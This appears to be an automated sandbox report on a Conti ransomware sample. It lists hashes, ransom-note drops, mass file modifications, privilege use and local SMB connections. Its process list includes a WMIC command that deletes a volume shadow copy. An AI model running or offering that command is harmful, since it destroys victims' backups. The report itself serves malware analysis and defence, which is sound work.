C:\Users\Admin\AppData\Roaming\779389082
| MD5 | fe292e7917d830e18d27a3998fca1ec3 |
| SHA1 | bac8235e38cb0568b13f26d945bee18257b38a46 |
| SHA256 | 62cd2f8be0163a0cf04bfd27b24b23149574d8c1226389dfa1bff638f8394651 |
| SHA512 | 148e60e57982d79695fe3cb8361a3580e321b8872bd2f232262a0aa46aa28d1bf51be3cf32bcc5c80a2093b6f2a7cf68f80e5705b46bb2eb71d0212844e2d82b |
C:\Users\Admin\AppData\Roaming\779389082
| MD5 | 0f33a9748ef0bb30d30b783bdc83a99c |
| SHA1 | 1a7fbc4b6e0cde24f7ee58eb45627c1641c989fa |
| SHA256 | aa93019b5bcc01adf7726d6f15aee83ea62cbc14f327e59f02a9a2342eb58e30 |
| SHA512 | 0f17a23dbf1251ec90291d54e4c8bacbd231c4809368fa0aa7d733c523174de43ad319eb098a7120ae9b60400894cf83b7eecb401744c36ec0e1fd5e4d6f2ca1 |
C:\Users\Admin\AppData\Roaming\779389082
| MD5 | a524ebe0dfab9ea297286050d66ba1ed |
| SHA1 | 665c7d801635dd431f3d97f08baf14b9daf8a6e1 |
| SHA256 | 4a095728d509404987228dc20d6e23db732f4a0ec6c66b0cf89699926b5ed3f6 |
| SHA512 | a924e8ba45d96c7193c9a61b2f1753bbaa48beeeb1a9058974534bb1fb58aa213841c6c729b414016d0c00fa7b1eca08da862a9fd045e3e5455aba826ba5c1c4 |
C:\Users\Admin\AppData\Roaming\779389082
| MD5 | 2d17f934f25fa2afe05b03468cb39468 |
| SHA1 | 7e1de8cb0b326438aa7a7e3dc2168579615dcd8d |
| SHA256 | 1c07aeddbabbf1775679040612da2e23ece91fc59f04b54bbf8a3c13c4baf8b3 |
| SHA512 | b79fc2195d752e62b1afd6bbccf745facd9f47442a7a843d55892189770914fc201fc75ed12c36cb2e53323396543ac68a405a0bdac973c21b5cee3a8d956bca |
C:\Users\Admin\AppData\Roaming\779389082
| MD5 | 32e8ec4346f13ce0568de7bf7fefb6fe |
| SHA1 | ad04279bd0147432c997ebe0d52fd80d662b2f8d |
| SHA256 | cf0ab6f8beb2f23ee9b75633ed2faaf82f14fa3ed797d8407a6a841b6e94d227 |
| SHA512 | 2abbe29c8f7342779da0ada5ce245a76e6c2f3b601615407e8924f847327063b09455233727562bb4367500b73ebe22ff0a2ff3257dd23f07f38b20ad2242199 |
C:\Users\Admin\AppData\Roaming\779389082
| MD5 | 79ecf11a4c0e2c95c2cb132dd124da9d |
| SHA1 | 2d36fc5b1a614127b5699e257c9df7ebc9fd7f0a |
| SHA256 | 8cffbaceb7c043551fef7b20ab7d5ce465c00e656980fc8bff19e1bc7f03b235 |
| SHA512 | 92bef0f9e1c521e05b37187c47f69a8fd9ea842c2c964613be798e528fc70eae15e18fcb5489176529c6ab546715a55b47f08dbeb141d998c8a8f993fee36c62 |
Analysis: behavioral14
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1709s
Max time network
1164s
Command Line
Signatures
Conti Ransomware
Renames multiple (7310) files with added filename extension
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
Reads user/profile data of web browsers
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\3D Objects\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\110.0.5481.104\VisualElements\SmallLogoCanary.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_fr_135x40.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\OMML2MML.XSL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-140.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\legal\javafx\jpeg_fx.md | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\new_icons.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\lua\meta\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\110.0.5481.104\Locales\de.pak | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_hover.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_selected_18.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Trial-pl.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\sdxs\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\ISO690Nmerical.XSL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\da.pak | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fil_get.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check_2x.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-pl.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\Xusage.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD.HXS | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\selector.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Common Files\microsoft shared\ink\fi-FI\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-phn.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\jre\lib\jfr\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hi.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ul-phn.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ug.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O17EnterpriseVL_Bypass30-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4236 wrote to memory of 4088 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 4236 wrote to memory of 4088 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 4088 wrote to memory of 2648 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\wbem\WMIC.exe |
| PID 4088 wrote to memory of 2648 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\wbem\WMIC.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{A958BAE6-B132-4B07-8587-5D3813184B5D}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{A958BAE6-B132-4B07-8587-5D3813184B5D}'" delete
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
